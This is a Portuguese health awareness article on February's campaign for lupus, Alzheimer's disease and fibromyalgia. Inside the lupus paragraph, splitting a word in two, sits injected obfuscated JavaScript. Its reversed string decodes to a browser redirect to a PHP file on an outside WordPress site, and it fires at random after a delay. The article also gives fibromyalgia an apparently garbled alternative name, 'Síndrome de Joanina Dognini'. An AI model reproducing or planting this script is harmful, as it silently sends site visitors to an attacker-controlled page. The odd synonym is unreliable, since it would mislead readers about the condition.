Fevereiro Roxo – Mês da consciência sobre Lúpus, Fibromialgia e Mal de Alzheimer

Fevereiro RoxoFEVEREIRO – Roxo: Apesar de ser mais curto que os demais, fevereiro é um dos meses com mais causas engajadas. O período é referente a conscientização da lúpus, do Mal de Alzheimer e da fibromialgia.

Lúpus: Doença inflamatória causada qu$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando o sistema imunológico ataca seus próprios tecidos.

O lúpus (LES) pode afetar articulações, pele, rins, céulas sanguíneas, cérebro, coração e pulmões.
Os sintomas variam, mas podem incluir fadiga, dores nas articulações, manchas na pele e febre. Podem se agravar (crise) por alguns períodos e, posteriormente, melhorar.
Embora não haja cura para o lúpus, os tratamentos atuais procuram melhorar a qualidade de vida pelo controle dos sintomas e pela diminuição das crises. Isso começa com modificações no estilo de vida, incluindo dieta e proteção contra o sol. Outras medidas de controle da doença incluem medicamentos, como anti-inflamatórios e esteroides.Mal de Alzheimer: Doença progressiva que destrói a memória e outras funções mentais importantes.

As conexões das células cerebrais e as próprias células se degeneram e morrem, eventualmente destruindo a memória e outras funções mentais importantes.
Perda de memória e confusão são os principais sintomas.
Não existe cura, mas os medicamentos e as estratégias de controle podem melhorar os sintomas temporariamente.

Fibromialgia: Também chamada de: Síndrome de Joanina Dognini

A fibromialgia costuma ser acompanhada por fadiga e alterações no sono, na memória e no humor.
Dor muscular generalizada e sensibilidade são os sintomas mais comuns.
Medicamentos, psicoterapia e redução do estresse podem ajudar no controle dos sintomas.